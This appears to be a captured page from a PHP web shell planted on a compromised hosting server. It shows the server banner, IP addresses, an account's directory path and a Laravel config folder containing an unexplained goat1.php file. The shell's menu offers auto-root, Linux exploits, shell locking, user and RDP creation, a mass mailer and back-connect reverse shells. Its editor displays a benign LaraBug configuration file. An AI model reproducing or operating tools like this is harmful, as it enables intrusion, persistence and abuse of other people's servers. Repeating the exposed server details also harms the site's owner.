Linux server1.signalhg.team 4.18.0-553.134.1.el8_10.x86_64 #1 SMP Tue Jun 16 16:05:57 EDT 2026 x86_64
Apache
: 209.74.80.147 | : 216.73.217.78
150 Domain
8.1.34
signgwph
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
signgwph /
signaltechdemo18.com /
config /
[ HOME SHELL ]
Name
Size
Permission
Action
.htaccess
127
B
-r--r--r--
app.php
4.58
KB
-rw-rw-r--
auth.php
4.03
KB
-rw-rw-r--
broadcasting.php
502
B
-rw-rw-r--
cache.php
3.34
KB
-rw-rw-r--
database.php
5.95
KB
-rw-rw-r--
debugbar.php
17.64
KB
-rw-rw-r--
default_currency.php
16.68
KB
-rw-rw-r--
email-providers.php
4.75
KB
-rw-rw-r--
error_log
2.74
KB
-rw-r--r--
filesystems.php
2.86
KB
-rw-rw-r--
goat1.php
143.87
KB
-rw-r--r--
installer.php
2.15
KB
-rw-rw-r--
larabug.php
4.63
KB
-rw-rw-r--
logging.php
4.22
KB
-rw-rw-r--
mail.php
3.41
KB
-rw-rw-r--
media-library.php
6.04
KB
-rw-rw-r--
permission.php
6.89
KB
-rw-rw-r--
queue.php
3.73
KB
-rw-rw-r--
sanctum.php
2.97
KB
-rw-rw-r--
services.php
1.01
KB
-rw-rw-r--
session.php
7.66
KB
-rw-rw-r--
verification.php
79
B
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : larabug.php
<?php return [ /* |-------------------------------------------------------------------------- | DSN (Data Source Name) |-------------------------------------------------------------------------- | | You can use a single DSN string to configure LaraBug instead of | individual keys. Format: https://login-key:project-key@host/path | Example: https://abc123:def456@www.larabug.com/api/log | | If DSN is set, it will take precedence over individual keys below. | */ 'dsn' => env('LB_DSN', ''), /* |-------------------------------------------------------------------------- | Login key |-------------------------------------------------------------------------- | | This is your authorization key which you get from your profile. | Retrieve your key from https://www.larabug.com | */ 'login_key' => env('LB_KEY', ''), /* |-------------------------------------------------------------------------- | Project key |-------------------------------------------------------------------------- | | This is your project key which you receive when creating a project | Retrieve your key from https://www.larabug.com | */ 'project_key' => env('LB_PROJECT_KEY', ''), /* |-------------------------------------------------------------------------- | Environment setting |-------------------------------------------------------------------------- | | This setting determines if the exception should be send over or not. | */ 'environments' => [ 'production', ], /* |-------------------------------------------------------------------------- | Project version |-------------------------------------------------------------------------- | | Set the project version, default: null. | For git repository: shell_exec("git log -1 --pretty=format:'%h' --abbrev-commit") | */ 'project_version' => null, /* |-------------------------------------------------------------------------- | Lines near exception |-------------------------------------------------------------------------- | | How many lines to show near exception line. The more you specify the bigger | the displayed code will be. Max value can be 50, will be defaulted to | 12 if higher than 50 automatically. | */ 'lines_count' => 12, /* |-------------------------------------------------------------------------- | Prevent duplicates |-------------------------------------------------------------------------- | | Set the sleep time between duplicate exceptions. This value is in seconds, default: 60 seconds (1 minute) | */ 'sleep' => 60, /* |-------------------------------------------------------------------------- | Skip exceptions |-------------------------------------------------------------------------- | | List of exceptions to skip sending. | */ 'except' => [ 'Symfony\Component\HttpKernel\Exception\NotFoundHttpException', ], /* |-------------------------------------------------------------------------- | Key filtering |-------------------------------------------------------------------------- | | Filter out these variables before sending them to LaraBug | */ 'blacklist' => [ '*authorization*', '*password*', '*token*', '*auth*', '*verification*', '*credit_card*', 'cardToken', // mollie card token '*cvv*', '*iban*', '*name*', '*email*' ], /* |-------------------------------------------------------------------------- | Release git hash |-------------------------------------------------------------------------- | | */ // 'release' => trim(exec('git --git-dir ' . base_path('.git') . ' log --pretty="%h" -n1 HEAD')), /* |-------------------------------------------------------------------------- | Server setting |-------------------------------------------------------------------------- | | This setting allows you to change the server. | */ 'server' => env('LB_SERVER', 'https://www.larabug.com/api/log'), /* |-------------------------------------------------------------------------- | Verify SSL setting |-------------------------------------------------------------------------- | | Enables / disables the SSL verification when sending exceptions to LaraBug | Never turn SSL verification off on production instances | */ 'verify_ssl' => env('LB_VERIFY_SSL', true), ];
Close